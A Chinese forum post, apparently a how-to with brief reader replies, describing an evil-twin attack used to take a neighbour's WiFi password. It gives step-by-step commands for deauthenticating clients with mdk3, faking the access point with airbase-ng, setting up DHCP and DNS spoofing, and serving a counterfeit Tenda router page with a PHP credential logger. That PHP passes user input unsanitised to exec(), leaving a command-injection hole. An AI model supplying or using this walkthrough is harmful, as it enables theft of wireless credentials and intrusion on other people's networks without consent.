现在破解Wlan密码的方式貌似就aircrack-ng和reaver两种常规方式，但是，如果我们碰到一个路由器，不支持pin，密码跑了20G字典都没出该怎么办？也许很多人会放弃，但是我碰到了这种情况，我在学校附近租房子有个信号最强的，密码也很强，跑了30G字典都没出。于是就到处找思路，就有了这篇文章。
简要介绍一下攻击方法：在目标AP有客户端连接时，我们持续攻击对方的AP，使其一直连不上去，这时，我们伪造一个和目标AP SSID一样的开放的AP，普通人发现自己的wifi上不了，下意识的肯定会点进我们的wifi，然后我们搭建好服务器，采用DNS欺骗，将对方的所有的HTTP请求redirect到我们本地搭建的网页，网页内容大致是你的路由器出错了，请输入密码恢复之类的，这个网页就是一个form表单，我们将他填写的内容用php保存，写入我们本地文件，就这样get了。看起来很简单，我研究了半个多月。唉，还是太笨了。

攻击平台：Kali Linux。
攻击者使用硬件工具：牛掰的无线网卡一块，装有Kali Linux的电脑一台。
攻击者使用软件：
airodump-ng
airbase-ng
lighttpd
udhcpd
ettercap
mdk3
php-cgi

安装好所有软件后配置一下lighttpd，开启他的php支持：
lighttpd-enable-mod fastcgi-php
准备好我们的伪造页面：
<html>
<head>
<meta charset="UTF-8">
<title>Tenda</title>
</head>
<body>
<div align="center">
<font size="6"><b>路由器出错了，请输入密码5分钟后重启您的路由器以恢复。</b></font>
</div>
<br>
<br>
<br>
<div align="center">
<form action="passwd.php" method="">
<input type="password" name="passwd" value="" />
<input type="submit" name="" value="确认重启" />
</form>
</div>
<br>
<br>
<br>
<div align="center">深圳市吉祥腾达科技有限公司 / © 2014 版权所有</div>
</body>
</html>

因为这里的目标是Tenda路由器，于是我就在最后面加了一行，如图：

提交到passwd.php：
<?php
header("Content-type: text/html; charset=utf-8");
$com = "touch password && echo $_GET[passwd] >> password";
exec($com);
echo "正在修复设置，请您于五分钟后手动重启路由器！";
?>
这段php代码的意思就是获取字段passwd后面的值然后写入文件password。

要想写入得给这个目录写的权限，lighttpd默认使用的主页文件夹是/var/www/：
chmod 777 /var/www/ -R
然后来测试试试：
service lighttpd restart
访问127.0.0.1看看，如图：

输入123456后点击提交，如图：

URL中已经出现了用户输入的内容，看看他是否写入的password文件内
cat /var/www/password
如图：

成功，一切正常，接下来是伪造AP，然后搭建DHCP服务器，让用户能正常连接WiFi：
先开启无线网卡的monitor模式，airbase-ng使用mon0这种虚拟接口貌似不行，于是开启wlan0的monitor模式，mon0用来执行mdk3的攻击，当然，别忘了伪造MAC地址：
airmon-ng start wlan0
ifconfig mon0 down
ifconfig wlan0 down
macchanger -r mon0 && macchanger -r wlan0
iwconfig wlan0 mode monitor
ifconfig wlan0 up
ifconfig mon0 up
如图：

开始伪造AP：
airbase-ng -e test -c 1 wlan0
如图：
出来了，然后是设置DHCP服务器和IP转发，不然用户无法连接，airbase-ng运行后会出来一个接口at0。我们将at0设置为网关，但是注意，不能与eth0在同一网段，如图：

eth0的IP地址是：192.168.18.128
我们将at0设置为192.168.16.1，at0默认是不启用的状态，需要先up：
ifconfig at0 up
ifconfig at0 192.168.16.1 netmask 255.255.255.0
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.16.1
前面两句代码不多说，最后面的意思是来自192.168.X.X的连接都定向到192.168.16.1去
at0设置完了，接下来设置dhcp服务
vim /etc/udhcpd.conf
里面一大堆参数，我们只需要修改：
start 192.168.16.20
end 192.168.16.200
interface at0
opt route 192.168.16.1
如图：

接下来启动udhcpd：
udhcpd -f /etc/udhcpd.conf
完成后效果，如图：

赞！楼主威武啊

这个思路很赞！！！

wifislax里面的蜜罐方式！

敢问万一邻居发现WiFi怎么没密码了怎么办

楼主把配置好的Backtrack 发上来？

顶楼主

屌炸天